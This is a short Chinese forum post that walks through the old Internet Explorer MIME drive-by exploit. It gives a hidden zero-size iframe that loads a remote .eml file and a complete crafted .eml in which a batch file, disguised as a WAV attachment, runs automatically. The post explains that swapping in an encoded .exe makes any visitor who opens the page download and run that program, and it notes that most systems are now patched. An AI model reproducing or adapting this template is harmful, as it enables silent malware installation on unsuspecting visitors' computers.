调试易

可以用MIME漏洞，在网页里插入一个框架
<IFRAME frameBorder=NO name="in" frameSpacing=0 height=0 marginHeight=0 marginWidth=0 noResize scrolling=no rc="http://xxxxxxxxx/bat.eml" width=0 vspale="0"></IFRAME>其中bat.eml的内容是关键！
你自己可以去找MIME漏洞，到这的安全论坛可找到他的代码事例。
我提供一段，供参考。From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1--1
Content-Type: multipart/alternative;
        boundary="2"
--2
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
</BODY>
</HTML>--2----1
Content-Type: audio/x-wav;
name="th.bat"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>dir > c:\1.txt--1他可以在c盘建立1.txt
也执行exe文件，只要把th.bat该为th.exe
在把dir > c:\1.txt,改为想要运行的程序的MIME编码就Ok了。
到时候打开这页就自动下载程序，并执行。
但现在很多的都打了补丁。这样不行了。:>